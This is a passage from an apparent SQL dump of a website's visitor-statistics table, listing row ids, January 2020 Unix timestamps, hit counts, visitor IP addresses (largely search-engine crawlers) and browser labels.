'),(474225,1578393507,1,1,0,0,'66.249.70.33','chrome'),(474226,1578393799,1,1,0,0,'95.47.151.6','chrome'),(474227,1578393802,1,1,0,0,'94.153.106.185','chrome'),(474228,1578393813,1,1,0,0,'188.163.44.77','chrome'),(474229,1578393933,1,1,0,0,'212.90.50.22','chrome'),(474230,1578393963,1,1,0,0,'66.249.64.26','chrome'),(474231,1578394200,4,4,0,0,'207.46.13.159','other'),(474232,1578394261,2,2,0,0,'46.211.100.106','chrome'),(474233,1578394463,1,1,0,0,'66.249.70.33','chrome'),(474234,1578394563,1,1,0,0,'8.29.198.27','other'),(474235,1578394830,1,1,0,0,'141.8.132.2','other'),(474236,1578395151,3,3,0,0,'66.249.64.26','chrome'),(474237,1578395677,1,1,0,0,'66.249.70.62','chrome'),(474238,1578395691,1,1,0,0,'8.29.198.27','other'),(474239,1578395966,1,1,0,0,'66.249.70.36','chrome'),(474240,1578396229,1,1,0,0,'128.68.137.69','chrome'),(474241,1578396625,1,1,0,0,'109.74.154.72','chrome'),(474242,1578396683,1,1,0,0,'128.199.129.97','firefox'),(474243,1578396785,8,8,0,0,'45.154.128.172','chrome'),(474244,1578396828,3,3,0,0,'94.231.187.154','chrome'),(474245,1578396922,1,1,0,0,'157.55.39.210','other'),(474246,1578397096,2,2,0,0,'66.249.64.26','chrome'),(474247,1578397241,1,1,0,0,'66.249.70.36','chrome'),(474248,1578397394,1,1,0,0,'195.160.206.80','other'),(474249,1578397691,2,2,0,0,'207.46.13.103','other'),(474250,1578397770,1,1,0,0,'37.52.233.99','chrome'),(474251,1578397809,1,1,0,0,'193.186.9.81','chrome'),(474252,1578397972,1,1,0,0,'178.209.132.183','chrome'),(474253,1578398117,1,1,0,0,'66.249.64.27','chrome'),(474254,1578398156,2,2,0,0,'66.249.64.26','chrome'),(474255,1578398431,1,1,0,0,'178.154.171.134','other'),(474256,1578398553,1,1,0,0,'37.55.36.109','chrome'),(474257,1578398748,1,1,0,0,'66.249.70.33','chrome'),(474258,1578399323,1,1,0,0,'66.249.64.27','chrome'),(474259,1578400138,2,2,0,0,'207.46.13.103','other'),(474260,1578400349,1,1,0,0,'91.196.178.54','chrome'),(474261,1578401664,1,1,0,0,'207.46.13.103','other'),(474262,1578401740,1,1,0,0,'207.46.13.187','other'),(474263,1578402603,1,1,0,0,'46.211.8.193','chrome'),(474264,1578402716,1,1,0,0,'188.33.87.136','chrome'),(474265,1578403125,2,2,0,0,'91.196.178.165','chrome'),(474266,1578403154,1,1,0,0,'46.211.221.92','chrome'),(474267,1578403358,1,1,0,0,'207.46.13.103','other'),(474268,1578403541,2,2,0,0,'157.55.39.9','other'),(474269,1578404582,2,2,0,0,'207.46.13.187','other'),(474270,1578404808,1,1,0,0,'46.211.10.3','chrome'),(474271,1578405151,1,1,0,0,'178.137.94.107','chrome'),(474272,1578405468,1,1,0,0,'8.29.198.26','other'),(474273,1578405656,1,1,0,0,'81.30.161.91','chrome'),(474274,1578406042,1,1,0,0,'66.249.64.26','chrome'),(474275,1578406616,1,1,0,0,'8.29.198.25','other'),(474276,1578407350,1,1,0,0,'212.90.62.189','chrome'),(474277,1578408103,1,1,0,0,'46.211.146.235','chrome'),(474278,1578408168,1,1,0,0,'66.249.70.62','chrome'),(474279,1578408395,2,2,0,0,'207.46.13.187','other'),(474280,1578408693,1,1,0,0,'157.55.39.210','other'),(474281,1578409333,1,1,0,0,'207.46.13.103','other'),(474282,1578409563,1,1,0,0,'66.249.64.26','chrome'),(474283,1578410066,1,1,0,0,'66.249.64.27','chrome'),(474284,1578410179,1,1,0,0,'130.180.217.148','chrome'),(474285,1578410768,1,1,0,0,'188.163.112.116','chrome'),(474286,1578411340,4,0,4,0,'157.55.39.9',''),(474287,1578411638,1,1,0,0,'207.46.13.187','other'),(474288,1578411733,2,2,0,0,'31.172.136.148','chrome'),(474289,1578412493,2,0,2,0,'157.55.39.210',''),(474290,1578412935,1,1,0,0,'128.124.234.62','chrome'),(474291,1578413176,1,1,0,0,'77.121.65.43','other'),(474292,1578413179,2,2,0,0,'94.178.183.68','chrome'),(474293,1578413273,2,2,0,0,'178.154.171.134','other'),(474294,1578413879,2,0,2,0,'207.46.13.187',''),(474295,1578414094,1,1,0,0,'173.252.95.34','other'),(474296,1578414095,1,1,0,0,'173.252.79.10','other'),(474298,1578414096,1,1,0,0,'173.252.87.8','other'),(474299,1578414470,1,1,0,0,'178.154.171.134','other'),(474300,1578414728,1,1,0,0,'207.46.13.187','other'),(474301,1578414746,1,1,0,0,'91.196.178.189','chrome'),(474302,1578415731,1,1,0,0,'66.249.70.36','chrome'),(474303,1578415801,1,1,0,0,'91.196.178.75','chrome'),(474304,1578416353,1,1,0,0,'8.29.198.26','other'),(474305,1578416575,1,1,0,0,'207.46.13.103','other'),(474306,1578417264,1,1,0,0,'185.212.251.138','chrome'),(474307,1578417555,1,1,0,0,'8.29.198.25','other'),(474308,1578417577,1,1,0,0,'178.154.171.134','other'),(474309,1578418846,1,1,0,0,'46.211.123.87','chrome'),(474310,1578418896,1,1,0,0,'46.211.5.76','chrome'),(474311,1578418931,1,1,0,0,'46.133.145.247','chrome'),(474312,1578419377,2,2,0,0,'95.106.252.33','chrome'),(474313,1578419867,1,1,0,0,'31.172.136.148','chrome'),(474314,1578419896,1,1,0,0,'207.46.13.187','other'),(474315,1578420258,1,1,0,0,'178.154.171.127','other'),(474316,1578420505,1,1,0,0,'207.46.13.103','other'),(474317,1578420883,1,1,0,0,'172.58.227.74','chrome'),(474318,1578421460,1,1,0,0,'141.8.142.2','chrome'),(474319,1578421591,1,1,0,0,'77.123.178.224','chrome'),(474320,1578422933,2,2,0,0,'157.55.39.9','other'),(474321,1578423554,1,1,0,0,'91.124.169.112','chrome'),(474322,1578423571,2,2,0,0,'178.154.171.134','other'),(474323,1578424524,1,0,1,0,'207.46.13.187',''),(474324,1578424526,1,1,0,0,'178.154.171.134','other'),(474325,1578425602,1,1,0,0,'178.154.171.134','other'),(474326,1578425842,3,3,0,0,'207.46.13.187','other'),(474327,1578427248,1,1,0,0,'8.29.198.27','other'),(474328,1578427273,1,1,0,0,'77.121.120.251','chrome'),(474329,1578427596,1,1,0,0,'178.154.171.134','other'),(474330,1578427647,2,2,0,0,'130.180.209.36','chrome'),(474331,1578427699,1,1,0,0,'78.106.169.40','other'),(474332,1578428099,1,1,0,0,'207.46.13.187','other'),(474333,1578428281,1,1,0,0,'157.55.39.247','other'),(474334,1578428527,1,1,0,0,'8.29.198.27','other'),(474335,1578429034,1,1,0,0,'207.46.13.187','other'),(474336,1578430372,1,1,0,0,'5.58.27.42','chrome'),(474337,1578430748,1,1,0,0,'94.178.32.223','chrome'),(474338,1578430914,2,2,0,0,'178.154.171.134','other'),(474339,1578430955,1,0,1,0,'157.55.39.247',''),(474340,1578431051,2,2,0,0,'157.55.39.247','other'),(474341,1578431191,1,1,0,0,'207.46.13.187','other'),(474342,1578433171,1,1,0,0,'178.154.171.134','other'),(474343,1578433220,1,1,0,0,'91.196.178.189','firefox'),(474344,1578433349,1,1,0,0,'207.46.13.91','other'),(474345,1578434148,2,2,0,0,'69.58.178.28','other'),(474346,1578434839,1,1,0,0,'157.55.39.247','other'),(474347,1578435943,1,1,0,0,'66.249.70.33','chrome'),(474348,1578437377,1,1,0,0,'157.55.39.196','other'),(474349,1578437665,1,1,0,0,'157.55.39.247','other'),(474350,1578437683,2,2,0,0,'178.154.171.134','other'),(474351,1578438155,1,1,0,0,'8.29.198.27','other'),(474352,1578439013,1,1,0,0,'157.55.39.196','other'),(474353,1578439078,1,1,0,0,'66.249.70.36','chrome'),(474354,1578439102,1,1,0,0,'157.55.39.247','other'),(474355,1578439471,1,1,0,0,'8.29.198.27','other'),(474356,1578439733,1,0,1,0,'207.46.13.187',''),(474357,1578440242,1,1,0,0,'66.249.70.62','chrome'),(474358,1578441307,1,1,0,0,'128.124.56.61','chrome'),(474359,1578441735,1,1,0,0,'178.154.171.134','other'),(474360,1578443592,1,1,0,0,'207.46.13.187','other'),(474361,1578444741,1,1,0,0,'157.55.39.247','other'),(474362,1578444915,1,1,0,0,'62.205.134.182','other'),(474363,1578445428,1,1,0,0,'178.154.171.127','other'),(474364,1578447015,2,2,0,0,'66.249.64.27','chrome'),(474365,1578447368,1,1,0,0,'157.55.39.196','other'),(474366,1578447389,2,2,0,0,'178.154.171.134','other'),(474367,1578447916,2,2,0,0,'66.249.64.26','chrome'),(474368,1578448179,1,1,0,0,'66.249.64.27','chrome'),(474369,1578448338,1,1,0,0,'66.249.70.62','chrome'),(474370,1578449010,2,2,0,0,'66.249.64.28','chrome'),(474371,1578449048,1,1,0,0,'8.29.198.25','other'),(474372,1578449075,2,2,0,0,'66.249.64.26','chrome'),(474373,1578449412,1,1,0,0,'66.249.70.33','chrome'),(474374,1578449429,1,1,0,0,'207.46.13.91','other'),(474375,1578449601,1,1,0,0,'178.154.171.127','other'),(474376,1578450042,2,2,0,0,'157.55.39.196','other'),(474377,1578450288,1,0,1,0,'207.46.13.121',''),(474378,1578450389,1,1,0,0,'8.29.198.26','other'),(474379,1578451222,1,1,0,0,'178.154.171.134','other'),(474380,1578451230,1,1,0,0,'141.8.188.25','other'),(474381,1578451272,1,1,0,0,'66.249.64.28','chrome'),(474382,1578451395,1,1,0,0,'66.249.64.26','chrome'),(474383,1578451909,1,0,1,0,'207.46.13.121',''),(474384,1578454333,1,1,0,0,'66.249.70.36','chrome'),(474385,1578454344,1,1,0,0,'157.55.39.126','other'),(474386,1578455927,1,1,0,0,'141.8.188.25','other'),(474387,1578456729,1,1,0,0,'157.55.39.120','other'),(474388,1578456819,1,1,0,0,'207.46.13.145','other'),(474389,1578458508,1,1,0,0,'207.46.13.62','other'),(474390,1578458673,1,1,0,0,'34.219.109.44','chrome'),(474391,1578458676,1,1,0,0,'52.34.24.33','other'),(474392,1578459938,1,1,0,0,'8.29.198.25','other'),(474393,1578461189,1,1,0,0,'178.154.171.127','other'),(474394,1578461309,1,1,0,0,'8.29.198.27','other'),(474395,1578462675,1,1,0,0,'62.205.134.182','other'),(474396,1578463891,1,1,0,0,'66.249.64.28','chrome'),(474397,1578465147,1,1,0,0,'178.154.171.134','other'),(474398,1578467217,1,1,0,0,'91.196.178.169','chrome'),(474399,1578467277,1,1,0,0,'66.249.64.27','chrome'),(474400,1578467699,1,1,0,0,'66.249.70.33','chrome'),(474401,1578468070,1,1,0,0,'37.9.113.39','other'),(474402,1578468296,1,1,0,0,'66.249.64.28','chrome'),(474403,1578468332,2,2,0,0,'207.46.13.62','other'),(474404,1578468995,1,1,0,0,'95.134.189.48','chrome'),(474405,1578470182,1,1,0,0,'91.192.133.225','chrome'),(474406,1578470227,1,1,0,0,'91.196.178.84','chrome'),(474407,1578470823,1,1,0,0,'8.29.198.27','other'),(474408,1578470950,1,1,0,0,'37.53.90.175','chrome'),(474409,1578472145,1,1,0,0,'54.208.102.37','other'),(474410,1578472147,1,1,0,0,'107.21.1.8','other'),(474411,1578472217,1,1,0,0,'8.29.198.27','other'),(474412,1578472270,1,1,0,0,'69.12.72.190','chrome'),(474413,1578473209,1,1,0,0,'66.249.64.27','chrome'),(474414,1578473246,1,1,0,0,'207.46.13.15','other'),(474415,1578473292,1,1,0,0,'207.46.13.62','other'),(474416,1578473489,1,1,0,0,'91.196.178.173','chrome'),(474417,1578473885,1,1,0,0,'78.111.210.31','chrome'),(474418,1578474763,1,1,0,0,'207.46.13.85','other'),(474419,1578475027,1,1,0,0,'193.57.41.248','chrome'),(474420,1578475231,1,1,0,0,'3.218.72.252','chrome'),(474421,1578475834,1,1,0,0,'176.117.81.207','chrome'),(474422,1578476058,1,1,0,0,'194.44.41.91','chrome'),(474423,1578476387,1,1,0,0,'37.53.90.175','chrome'),(474424,1578476690,1,1,0,0,'178.154.171.134','other'),(474425,1578477583,1,1,0,0,'66.249.64.27','chrome'),(474426,1578477800,1,1,0,0,'178.154.171.134','other'),(474427,1578477918,1,1,0,0,'37.53.90.175','chrome'),(474428,1578477998,1,1,0,0,'207.46.13.189','other'),(474429,1578478346,1,1,0,0,'176.111.33.18','firefox'),(474430,1578478366,1,1,0,0,'178.92.158.118','chrome'),(474431,1578478929,1,1,0,0,'178.154.171.127','other'),(474432,1578479071,1,1,0,0,'178.154.171.134','other'),(474433,1578479453,1,1,0,0,'91.196.178.74','firefox'),(474434,1578479813,1,1,0,0,'157.55.39.55','other'),(474435,1578479983,1,0,1,0,'207.46.13.85',''),(474436,1578480000,1,1,0,0,'77.222.134.102','chrome'),(474437,1578480289,1,1,0,0,'207.46.13.62','other'),(474438,1578480360,1,1,0,0,'91.196.178.74','firefox'),(474439,1578480682,1,1,0,0,'176.104.184.9','chrome'),(474440,1578480825,2,2,0,0,'95.213.141.126','opera'),(474441,1578481225,1,1,0,0,'66.249.64.28','chrome'),(474442,1578481346,1,1,0,0,'207.46.13.62','other'),(474443,1578481442,1,1,0,0,'91.196.178.59','chrome'),(474444,1578481564,1,1,0,0,'207.46.13.15','other'),(474445,1578481701,1,1,0,0,'8.29.198.25','other'),(474446,1578481916,1,1,0,0,'207.46.13.85','other'),(474447,1578481998,1,1,0,0,'80.246.141.217','chrome'),(474448,1578482205,1,0,1,0,'157.55.39.55',''),(474449,1578483034,1,1,0,0,'66.249.64.27','chrome'),(474450,1578483129,1,1,0,0,'8.29.198.25','other'),(474451,1578483458,1,1,0,0,'195.10.210.70','firefox'),(474452,1578483859,1,1,0,0,'109.74.154.72','chrome'),(474453,1578484103,1,1,0,0,'78.111.210.31','chrome'),(474454,1578484731,1,1,0,0,'91.196.178.68','firefox'),(474455,1578484946,1,1,0,0,'66.249.64.26','chrome'),(474456,1578484958,1,1,0,0,'95.67.72.70','chrome'),(474457,1578485333,1,1,0,0,'37.53.90.175','chrome'),(474458,1578485925,1,1,0,0,'157.55.39.55','other'),(474459,1578486692,1,1,0,0,'213.159.242.117','other'),(474460,1578486979,1,1,0,0,'157.55.39.55','other'),(474461,1578487118,1,0,1,0,'207.46.13.15',''),(474462,1578488453,1,1,0,0,'91.196.178.164','chrome'),(474463,1578488745,2,2,0,0,'157.55.39.55','other'),(474464,1578489566,1,1,0,0,'207.46.13.105','other'),(474465,1578489913,2,2,0,0,'207.46.13.15','other'),(474466,1578490471,1,1,0,0,'193.106.30.99','firefox'),(474467,1578490706,1,1,0,0,'92.112.125.139','chrome'),(474468,1578491249,1,1,0,0,'91.185.191.243','chrome'),(474469,1578492107,1,1,0,0,'95.134.117.66','chrome'),(474470,1578492486,1,1,0,0,'141.8.132.19','other'),(474471,1578492594,1,1,0,0,'8.29.198.25','other'),(474472,1578492642,1,1,0,0,'81.88.49.37','chrome'),(474473,1578492699,1,1,0,0,'91.196.178.77','chrome'),(474474,1578492718,1,1,0,0,'178.210.175.180','chrome'),(474475,1578492993,1,1,0,0,'91.196.178.84','chrome'),(474476,1578493137,1,1,0,0,'66.249.64.28','chrome'),(474477,1578493517,1,0,1,0,'157.55.39.55',''),(474478,1578493604,1,1,0,0,'66.249.70.33','chrome'),(474479,1578494076,1,1,0,0,'8.29.198.27','other'),(474480,1578494212,1,1,0,0,'66.249.70.62','chrome'),(474481,1578494528,1,1,0,0,'101.53.137.26','chrome'),(474482,1578494671,1,1,0,0,'178.154.171.7','other'),(474483,1578494683,1,1,0,0,'87.250.224.104','other'),(474484,1578494770,1,1,0,0,'91.196.178.86','firefox'),(474485,1578494894,2,2,0,0,'185.41.21.83','chrome'),(474486,1578495195,2,2,0,0,'207.46.13.15','other'),(474487,1578495591,1,1,0,0,'66.249.64.26','chrome'),(474488,1578495690,1,1,0,0,'37.52.236.67','chrome'),(474489,1578495938,1,1,0,0,'91.124.119.199','chrome'),(474490,1578496712,1,1,0,0,'66.249.64.27','chrome'),(474491,1578496953,1,1,0,0,'13.66.139.0','other'),(474492,1578497501,1,1,0,0,'157.55.39.55','other'),(474493,1578498220,1,1,0,0,'91.196.178.25','chrome'),(474494,1578498257,1,1,0,0,'207.46.13.15','other'),(474495,1578498453,3,3,0,0,'193.203.48.117','firefox'),(474496,1578498455,1,1,0,0,'193.203.48.117','chrome'),(474497,1578498782,1,1,0,0,'37.9.113.33','other'),(474498,1578498906,1,1,0,0,'78.111.210.31','chrome'),(474499,1578499582,1,1,0,0,'82.207.91.234','other'),(474500,1578501159,1,1,0,0,'157.55.39.55','other'),(474501,1578501183,1,1,0,0,'141.8.188.18','other'),(474502,1578501511,1,1,0,0,'66.249.70.36','chrome'),(474503,1578503356,2,2,0,0,'66.249.64.26','chrome'),(474504,1578503486,1,1,0,0,'8.29.198.26','other'),(474505,1578503733,1,0,1,0,'207.46.13.15',''),(474506,1578504219,1,1,0,0,'66.249.70.33','chrome'),(474507,1578504503,3,3,0,0,'157.55.39.55','other'),(474508,1578504599,2,2,0,0,'207.46.13.15','other'),(474509,1578505046,1,1,0,0,'8.29.198.25','other'),(474510,1578505977,2,2,0,0,'66.249.64.27','chrome'),(474511,1578506660,1,1,0,0,'207.46.13.54','other'),(474512,1578507668,1,1,0,0,'109.203.100.157','chrome'),(474513,1578508470,1,1,0,0,'46.211.69.145','chrome'),(474514,1578510583,1,1,0,0,'157.55.39.156','other'),(474515,1578510806,1,1,0,0,'178.154.171.127','other'),(474516,1578510848,1,1,0,0,'141.8.142.164','other'),(474517,1578511262,1,1,0,0,'207.46.13.105','other'),(474518,1578511414,2,2,0,0,'66.249.64.28','chrome'),(474519,1578511759,1,1,0,0,'178.154.171.134','other'),(474520,1578511941,1,0,1,0,'207.46.13.54',''),(474521,1578512978,1,1,0,0,'157.55.39.156','other'),(474522,1578513577,2,2,0,0,'207.46.13.15','other'),(474523,1578514009,1,1,0,0,'207.46.13.105','other'),(474524,1578514142,1,0,1,0,'66.249.70.62',''),(474525,1578514395,1,1,0,0,'8.29.198.26','other'),(474526,1578514995,1,1,0,0,'66.249.64.26','chrome'),(474527,1578515340,1,0,1,0,'207.46.13.54',''),(474528,1578516057,1,1,0,0,'8.29.198.25','other'),(474529,1578516170,1,1,0,0,'207.46.13.15','other'),(474530,1578516694,1,1,0,0,'178.154.171.134','other'),(474531,1578516749,1,1,0,0,'66.249.64.26','chrome'),(474532,1578516783,1,1,0,0,'66.249.64.28','chrome'),(474533,1578517162,1,1,0,0,'66.249.70.36','chrome'),(474534,1578517448,1,1,0,0,'207.46.13.105','other'),(474535,1578517886,1,1,0,0,'66.249.64.28','chrome'),(474536,1578517980,1,1,0,0,'50.62.161.13','chrome'),(474537,1578519048,1,1,0,0,'66.249.64.27','chrome'),(474538,1578519258,1,1,0,0,'207.46.13.54','other'),(474539,1578520551,2,0,2,0,'207.46.13.15',''),(474540,1578520553,2,2,0,0,'66.249.64.27','chrome'),(474541,1578521013,1,1,0,0,'66.249.64.28','chrome'),(474542,1578521070,2,2,0,0,'178.154.171.134','other'),(474543,1578521981,1,1,0,0,'207.46.13.105','other'),(474544,1578521990,1,1,0,0,'66.249.64.26','chrome'),(474545,1578522071,1,1,0,0,'66.249.70.33','chrome'),(474546,1578522528,2,2,0,0,'91.208.99.2','chrome'),(474547,1578523174,1,1,0,0,'66.249.64.26','chrome'),(474548,1578523612,1,1,0,0,'207.46.13.15','other'),(474549,1578524741,1,1,0,0,'178.154.171.127','other'),(474550,1578524818,1,1,0,0,'66.249.64.26','chrome'),(474551,1578524841,1,1,0,0,'66.249.64.28','chrome'),(474552,1578525272,1,1,0,0,'8.29.198.26','other'),(474553,1578525796,1,1,0,0,'66.249.64.28','chrome'),(474554,1578526709,1,1,0,0,'207.46.13.54','other'),(474555,1578526997,1,1,0,0,'8.29.198.27','other'),(474556,1578527265,1,1,0,0,'207.46.13.15','other'),(474557,1578527469,2,2,0,0,'69.163.163.117','chrome'),(474558,1578527560,1,1,0,0,'66.249.70.36','chrome'),(474559,1578527623,1,1,0,0,'66.249.64.28','chrome'),(474560,1578527659,1,1,0,0,'157.55.39.156','other'),(474561,1578527698,1,1,0,0,'66.249.64.27','chrome'),(474562,1578527863,2,0,2,0,'207.46.13.105',''),(474563,1578529422,1,1,0,0,'66.249.64.28','chrome'),(474564,1578529518,2,2,0,0,'66.249.64.27','chrome'),(474565,1578529772,1,1,0,0,'66.249.70.36','chrome'),(474566,1578530086,1,1,0,0,'195.123.196.188','other'),(474567,1578530346,1,1,0,0,'66.249.64.26','chrome'),(474568,1578530441,1,1,0,0,'157.55.39.156','other'),(474569,1578530517,1,1,0,0,'207.46.13.15','other'),(474570,1578530660,1,1,0,0,'207.46.13.105','other'),(474571,1578531315,1,1,0,0,'62.205.134.182','other'),(474572,1578531538,1,1,0,0,'178.154.171.127','other'),(474573,1578531580,1,1,0,0,'66.249.64.27','chrome'),(474574,1578531628,1,1,0,0,'66.249.64.26','chrome'),(474575,1578531721,1,1,0,0,'37.73.40.54','chrome'),(474576,1578532605,1,1,0,0,'178.154.171.134','other'),(474577,1578533252,1,1,0,0,'157.55.39.156','other'),(474578,1578534725,1,1,0,0,'66.249.70.33','chrome'),(474579,1578535302,1,1,0,0,'207.46.13.15','other'),(474580,1578535874,1,1,0,0,'178.154.171.134','other'),(474581,1578536147,1,1,0,0,'8.29.198.27','other'),(474582,1578537359,1,1,0,0,'157.55.39.156','other'),(474583,1578537939,1,1,0,0,'8.29.198.26','other'),(474584,1578538307,1,1,0,0,'35.161.157.82','chrome'),(474585,1578538310,1,1,0,0,'52.41.211.72','other'),(474586,1578538470,1,1,0,0,'66.249.64.27','chrome'),(474587,1578538892,1,1,0,0,'178.154.171.127','other'),(474588,1578538997,1,1,0,0,'207.46.13.54','other'),(474589,1578539715,2,0,2,0,'157.55.39.156',''),(474590,1578543870,1,1,0,0,'31.13.115.14','other'),(474591,1578543871,1,1,0,0,'31.13.115.4','other'),(474592,1578544380,1,1,0,0,'157.55.39.156','other'),(474593,1578544825,1,1,0,0,'66.249.64.27','chrome'),(474594,1578545606,1,1,0,0,'207.46.13.15','other'),(474595,1578546126,1,1,0,0,'66.249.64.28','chrome'),(474596,1578546344,2,2,0,0,'66.249.64.26','chrome'),(474597,1578546471,2,2,0,0,'66.249.70.36','chrome'),(474598,1578546509,1,1,0,0,'77.247.127.71','other'),(474599,1578546864,1,1,0,0,'91.196.178.130','firefox'),(474600,1578546911,1,1,0,0,'207.46.13.15','other'),(474601,1578547023,1,1,0,0,'8.29.198.27','other'),(474602,1578547270,1,1,0,0,'66.249.70.33','chrome'),(474603,1578548078,1,1,0,0,'77.247.127.71','other'),(474604,1578548550,3,3,0,0,'157.55.39.156','other'),(474605,1578548845,1,1,0,0,'8.29.198.26','other'),(474606,1578548858,1,1,0,0,'62.205.134.182','other'),(474607,1578548982,1,1,0,0,'66.249.64.27','chrome'),(474608,1578549047,1,1,0,0,'66.249.70.62','chrome'),(474609,1578549876,1,1,0,0,'207.46.13.15','other'),(474610,1578550545,1,1,0,0,'66.249.64.27','chrome'),(474611,1578550561,2,2,0,0,'66.249.64.28','chrome'),(474612,1578550636,1,1,0,0,'31.13.127.12','other'),(474613,1578550637,1,1,0,0,'31.13.127.22','other'),(474614,1578551552,2,2,0,0,'66.249.64.26','chrome'),(474615,1578551565,1,1,0,0,'91.218.15.4','chrome'),(474616,1578551828,1,1,0,0,'91.196.178.85','chrome'),(474617,1578552390,1,1,0,0,'66.249.70.33','chrome'),(474618,1578552887,1,1,0,0,'207.46.13.68','other'),(474619,1578553129,1,1,0,0,'66.249.64.27','chrome'),(474620,1578553180,2,2,0,0,'178.154.171.134','other'),(474621,1578553312,1,1,0,0,'66.249.70.62','chrome'),(474622,1578553609,1,1,0,0,'66.249.64.26','chrome'),(474623,1578553866,1,1,0,0,'66.249.64.28','chrome'),(474624,1578553961,1,1,0,0,'51.68.152.26','chrome'),(474625,1578554404,1,1,0,0,'66.249.70.36','chrome'),(474626,1578554785,1,1,0,0,'207.46.13.20','other'),(474627,1578554787,2,2,0,0,'66.249.64.27','chrome'),(474628,1578554862,2,2,0,0,'66.249.64.28','chrome'),(474629,1578554973,2,2,0,0,'66.249.64.26','chrome'),(474630,1578555700,1,1,0,0,'91.196.179.25','firefox'),(474631,1578555821,1,1,0,0,'188.121.57.45','chrome'),(474632,1578555872,1,1,0,0,'207.46.13.20','other'),(474633,1578555952,1,1,0,0,'3.122.60.192','other'),(474640,1578555953,1,1,0,0,'3.122.60.192','other'),(474641,1578556036,1,1,0,0,'141.8.142.86','other'),(474642,1578556208,1,1,0,0,'207.46.13.15','other'),(474643,1578556487,3,3,0,0,'66.249.64.26','chrome'),(474644,1578556808,1,1,0,0,'66.249.70.36','chrome'),(474645,1578556820,2,2,0,0,'66.249.64.27','chrome'),(474646,1578556905,1,1,0,0,'66.249.70.33','chrome'),(474647,1578557224,1,1,0,0,'91.196.178.185','chrome'),(474648,1578557456,1,1,0,0,'66.249.64.26','chrome'),(474649,1578557658,1,1,0,0,'66.249.64.28','chrome'),(474650,1578557881,1,1,0,0,'8.29.198.25','other'),(474651,1578558006,1,1,0,0,'91.196.178.164','chrome'),(474652,1578558010,2,2,0,0,'66.249.64.27','chrome'),(474653,1578558184,1,1,0,0,'207.46.13.20','other'),(474654,1578558207,1,1,0,0,'91.196.177.46','chrome'),(474655,1578558759,3,3,0,0,'66.249.64.26','chrome'),(474656,1578558788,1,1,0,0,'91.196.178.89','chrome'),(474657,1578558808,4,4,0,0,'66.249.64.28','chrome'),(474658,1578559011,3,3,0,0,'66.249.64.27','chrome'),(474659,1578559398,1,1,0,0,'88.154.221.78','chrome'),(474660,1578559585,1,1,0,0,'66.249.70.33','chrome'),(474661,1578559757,3,3,0,0,'66.249.64.28','chrome'),(474662,1578559782,1,1,0,0,'8.29.198.26','other'),(474663,1578560381,1,1,0,0,'207.46.13.68','other'),(474664,1578560424,1,1,0,0,'207.46.13.15','other'),(474665,1578560481,1,1,0,0,'207.46.13.20','other'),(474666,1578560555,1,1,0,0,'94.178.146.51','firefox'),(474667,1578560606,1,1,0,0,'91.196.178.85','chrome'),(474668,1578560854,3,3,0,0,'66.249.64.26','chrome'),(474669,1578561218,1,1,0,0,'91.196.178.68','firefox'),(474670,1578561370,2,2,0,0,'66.249.64.28','chrome'),(474671,1578561751,2,2,0,0,'66.249.64.27','chrome'),(474672,1578561924,1,1,0,0,'66.249.64.26','chrome'),(474673,1578561948,1,1,0,0,'66.249.70.62','chrome'),(474674,1578562223,1,1,0,0,'91.196.178.86','chrome'),(474675,1578562257,1,1,0,0,'5.35.65.168','chrome'),(474676,1578562386,1,1,0,0,'46.211.134.219','chrome'),(474677,1578562773,1,1,0,0,'178.154.171.134','other'),(474678,1578562985,1,1,0,0,'91.196.178.173','chrome'),(474679,1578563173,2,0,2,0,'207.46.13.20',''),(474680,1578563231,1,1,0,0,'18.221.208.121','chrome'),(474681,1578563396,2,2,0,0,'66.249.64.27','chrome'),(474682,1578563507,1,1,0,0,'66.249.64.26','chrome'),(474683,1578564022,1,1,0,0,'46.201.128.124','chrome'),(474684,1578564044,1,1,0,0,'178.154.171.134','other'),(474685,1578565023,1,1,0,0,'94.45.125.100','chrome'),(474686,1578565062,2,2,0,0,'188.190.164.50','chrome'),(474687,1578565249,1,1,0,0,'178.154.171.134','other'),(474688,1578565261,1,1,0,0,'87.250.224.90','other'),(474689,1578565738,3,3,0,0,'66.249.64.26','chrome'),(474690,1578565887,1,1,0,0,'207.46.13.194','other'),(474691,1578565902,1,1,0,0,'66.249.70.33','chrome'),(474692,1578565940,1,1,0,0,'207.46.13.20','other'),(474693,1578566013,2,2,0,0,'66.249.64.28','chrome'),(474694,1578566150,1,1,0,0,'66.249.70.62','chrome'),(474695,1578566797,2,2,0,0,'66.249.64.27','chrome'),(474696,1578567011,1,1,0,0,'91.196.178.85','chrome'),(474697,1578567141,1,1,0,0,'66.249.70.33','chrome'),(474698,1578567797,1,1,0,0,'91.196.178.25','chrome'),(474699,1578568662,2,2,0,0,'66.249.64.26','chrome'),(474700,1578568774,1,1,0,0,'8.29.198.27','other'),(474701,1578569331,1,1,0,0,'66.249.64.27','chrome'),(474702,1578569560,1,1,0,0,'109.74.154.72','chrome'),(474703,1578569841,1,1,0,0,'91.196.178.164','chrome'),(474704,1578569895,1,1,0,0,'66.249.64.28','chrome'),(474705,1578569940,3,3,0,0,'66.249.64.26','chrome'),(474706,1578570065,1,1,0,0,'66.249.70.62','chrome'),(474707,1578570169,2,2,0,0,'195.161.41.204','chrome'),(474708,1578570690,1,1,0,0,'142.93.225.121','chrome'),(474709,1578570728,1,1,0,0,'8.29.198.26','other'),(474710,1578570901,1,1,0,0,'66.249.64.28','chrome'),(474711,1578570947,1,1,0,0,'66.249.70.33','chrome'),(474712,1578571001,1,1,0,0,'66.249.64.26','chrome'),(474713,1578572154,1,0,1,0,'207.46.13.194',''),(474714,1578572900,2,2,0,0,'66.249.70.33','chrome'),(474715,1578573050,1,1,0,0,'66.249.64.27','chrome'),(474716,1578573314,3,3,0,0,'66.249.64.26','chrome'),(474717,1578573700,2,2,0,0,'178.154.171.134','other'),(474718,1578573884,1,1,0,0,'66.102.9.164','chrome'),(474719,1578573981,1,1,0,0,'95.135.3.205','chrome'),(474720,1578574956,1,1,0,0,'66.249.64.26','chrome'),(474721,1578575101,1,1,0,0,'66.249.64.28','chrome'),(474722,1578575847,1,1,0,0,'178.154.171.134','other'),(474723,1578576688,1,1,0,0,'207.46.13.194','other'),(474724,1578576796,1,1,0,0,'66.249.64.26','chrome'),(474725,1578578013,1,1,0,0,'207.46.13.20','other'),(474726,1578578318,1,1,0,0,'66.249.64.26','chrome'),(474727,1578579226,1,1,0,0,'66.249.64.27','chrome'),(474728,1578579648,1,1,0,0,'8.29.198.25','other'),(474729,1578580345,1,1,0,0,'66.249.64.27','chrome'),(474730,1578580483,1,1,0,0,'178.154.171.127','other'),(474731,1578580618,1,1,0,